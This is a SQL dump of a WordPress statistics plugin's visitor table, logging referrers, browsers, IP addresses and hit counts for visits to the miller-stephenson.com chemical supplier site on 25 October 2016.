INSERT INTO `wp_statistics_visitor` VALUES (11166, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11167, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '83.42.247.49', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11168, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '108.175.12.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11169, '2016-10-25', 'https://komputers-best.ru/', 'MSIE', 'Windows', '6.0', '', '176.8.88.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11170, '2016-10-25', 'https://www.google.com/', 'Safari', 'iPad', '8.0', '', '99.45.96.224', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11171, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.146.239.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11172, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.167.25.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11173, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.187.0.112', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11174, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.38.82.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11175, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.206.157.43', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11176, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11177, '2016-10-25', 'https://medicines-choice.com/', 'MSIE', 'Windows', '6.0', '', '46.119.118.233', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11178, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11179, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '145.255.9.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11180, '2016-10-25', 'https://btvn.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.95.202', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11181, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.28.29.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11182, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 117, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11183, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '150.70.173.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11184, '2016-10-25', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.16', '', '113.77.87.223', '000', 34, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11185, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.29.75.140', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11186, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.235.188.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11187, '2016-10-25', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.16', '', '119.128.175.254', '000', 151, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11188, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.124.100.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11189, '2016-10-25', 'https://asianlesbians.xblog.in', 'Firefox', 'Windows', '43.0', '', '176.31.7.241', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11190, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '50.0.2661.87', '', '169.234.109.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11191, '2016-10-25', 'https://lamboclone.com/index.php?topic=317.0', 'Chrome', 'Windows', '53.0.2785.143', '', '208.72.139.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11192, '2016-10-25', 'https://www.so.com/link?url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&q=miller-stephenson+MS+262&ts=1477360289&t=2f5248c264e0f103e0288fda21cad28&src=haosou', 'Chrome', 'Windows', '45.0.2454.101', '', '116.252.36.115', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11193, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.172.53.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11194, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.180.237', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11195, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '50.154.25.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11196, '2016-10-25', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11197, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '14.161.10.76', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11198, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.52.206.204', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11199, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '118.193.207.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11200, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.201.205.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11201, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '218.17.181.201', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11202, '2016-10-25', 'https://www.google.com/', 'MSIE', 'Windows', '9.0', '', '101.226.33.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11203, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '129.138.130.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11204, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.104.194.107', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11205, '2016-10-25', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.214.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11206, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.155.215.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11207, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.74.108.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11208, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.93.144.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11209, '2016-10-25', 'https://www.google.com.hk/', 'Chrome', 'Windows', '53.0.2785.143', '', '202.146.217.63', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11210, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.198.38.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11211, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '193.227.78.66', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11212, '2016-10-25', 'https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=10&ved=0ahUKEwiHvdGM-vTPAhUQS48KHWd2C7gQFghDMAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Ffluoroguard-pro%2F&usg=AFQjCNHORwxkgS6Q_YkC3ZW1ePtGTqAF5Q', 'MSIE', 'Windows', '10.0', '', '167.184.214.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11213, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.111.86.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11214, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '36.0', '', '45.45.193.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11215, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11216, '2016-10-25', 'https://www.google.com/search', 'Chrome', 'Linux', '27.0.1453', '', '228.206.199.88', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11217, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '24.91.80.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11218, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '71.198.142.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11219, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '2406:5600:69:d169:44af:5a8c:dbbe:c754', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11220, '2016-10-25', 'https://www.google.com/', 'Vivaldi', 'Windows', '1.4.589.38', '', '99.196.41.21', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11221, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.36', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11222, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '90.188.38.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11223, '2016-10-25', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.2', '', '100.8.97.194', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11224, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11225, '2016-10-25', 'https://www.google.co.nz/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjqltyOgfXPAhVHNpQKHWOTDVAQFgglMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-1031%2F&usg=AFQjCNE-m3DOtEietXwsmA6PglKC2q1ppA', 'MSIE', 'Windows', '11.0', '', '131.203.9.108', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11226, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '99.12.199.4', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11227, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.165.233.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11228, '2016-10-25', 'https://cn.bing.com/search?q=Miller+Stephenson&go=%E6%90%9C%E7%B4%A2&qs=n&form=QBRE&pq=miller+stephenson&sc=8-17&sp=-1&sk=&cvid=AF12C743E02249BA8129E329C15F9B41', 'Chrome', 'Windows', '45.0.2454.101', '', '211.136.132.94', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11229, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.91.101.31', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11230, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.255.77.77', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11231, '2016-10-25', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.91.75.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11232, '2016-10-25', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.91.75.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11233, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.255.14.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11234, '2016-10-25', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.91.75.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11235, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.85.140.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11236, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.69.0.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11237, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '51.0.2704.81', '', '70.162.246.203', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11238, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.57.97.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11239, '2016-10-25', 'https://www.google.ru/', 'Chrome', 'Windows', '54.0.2840.59', '', '94.240.171.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11240, '2016-10-25', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '70.95.74.161', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11241, '2016-10-25', 'https://www.google.com/search?ei=uN8OWJWlMIeNsAHOoKC4DA&q=what+properties+of+polymers+can+be+based+on+for+measuring+the+molecular+weight%3F&oq=what+properties+of+polymers+can+be+based+on+for+measuring+the+molecular+weight%3F&gs_l=mobile-gws-serp.12...15026.15026.0.16387.1.1.0.0.0.0.513.513.5-1.1.0....0...1.1.64.mobile-gws-serp..0.0.0.seBeSg-P6ck', 'Chrome', 'Android', '34.0.1847.76', '', '23.239.16.183', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11242, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.74.170.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11243, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.140.70.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11244, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '70.67.43.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11245, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.69.35.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11246, '2016-10-25', 'https://www.google.com.au/', 'Edge', 'Windows', '13.10586', '', '101.160.25.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11247, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.232.55.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11248, '2016-10-25', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0.1', '', '104.193.7.202', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11249, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.37.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11250, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.114.148.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11251, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.161.20.105', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11252, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.235.104.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11253, '2016-10-25', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.127.129', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11254, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.111.188.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11255, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.22.137.57', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11256, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.67.23.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11257, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.79.143.113', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11258, '2016-10-25', 'https://www.google.com.au/', 'Firefox', 'Windows', '49.0', '', '203.217.64.98', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11259, '2016-10-25', 'https://www.miller-stephenson.com/', 'Opera Next', 'Windows', '26.0.1656.60', '', '23.250.70.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11260, '2016-10-25', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '23.250.70.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11261, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.124.151.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11262, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11263, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.144.171.218', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11264, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11265, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '29.0', '', '54.91.79.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11266, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Chrome OS', '53.0.2785.154', '', '104.132.20.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11267, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.168.81.7', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11268, '2016-10-25', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.119.115.234', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11269, '2016-10-25', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '117.247.177.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11270, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.139.246.41', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11271, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.167.150.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11272, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '171.33.253.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11273, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.164.254.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11274, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.234.96.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11275, '2016-10-25', 'https://www.google.co.in/', 'Chrome', 'Windows', '54.0.2840.71', '', '61.0.233.237', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11276, '2016-10-25', 'https://www.google.co.il/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwj6oImenPXPAhWjJsAKHad6AFEQFgh9MAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.136499718,bs.1,d.d24&cad=rja', 'MSIE', 'Windows', '11.0', '', '192.117.142.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11277, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '158.58.129.139', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11278, '2016-10-25', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.115.183.198', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11279, '2016-10-25', 'https://www.miller-stephenson.com/krytox/?print=y', 'MSIE', 'Windows', '9.0', '', '182.118.20.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11280, '2016-10-25', 'https://www.bing.com/', 'Safari', 'Macintosh', '9.1.3', '', '77.234.44.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11281, '2016-10-25', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/', 'MSIE', 'Windows', '11.0', '', '87.68.1.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11282, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11283, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '600.1.4', '', '107.151.128.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11284, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.244.114.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11285, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.122.61.230', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11286, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.29.11.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11287, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.106.244.180', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11288, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CFEQFjAG&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Fkrytox-lubricants%2F&ei=NfcOWMzrEOfdnwb7Fw&usg=AFQjCNFJMcZt6xCpXzcHAOYSpI7Q31y8hg', 'MSIE', 'Windows', '11.0', '', '66.102.6.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11289, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.30.235.171', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11290, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.151.193.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11291, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.94.14.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11292, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.172.68.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11293, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.231.9.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11294, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.80.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11295, '2016-10-25', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0ahUKEwiV1Z3mq_XPAhWBbbwKHUdkA0YQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepikure-3290%2Fattachment%2F3290%2F&usg=AFQjCNGTu7teDJbGR__Suq4_5EAD85k6Vw&bvm=bv.136593572,d.dGc', 'MSIE', 'Windows', '10.0', '', '218.222.192.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11296, '2016-10-25', 'https://www.google.nl/', 'Chrome', 'Windows', '53.0.2785.143', '', '92.70.12.153', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11297, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.21.8.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11298, '2016-10-25', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11299, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.218.55.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11300, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.255.150.8', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11301, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.77.237', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11302, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.205.254.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11303, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.194.186.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11304, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.72.0.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11305, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.38.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11306, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '183.82.113.191', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11307, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '27.153.220.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11308, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.228.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11309, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.200.82.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11310, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.28.143.251', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11311, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.78.157.40', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11312, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.3.68.91', '000', 2, 0); 
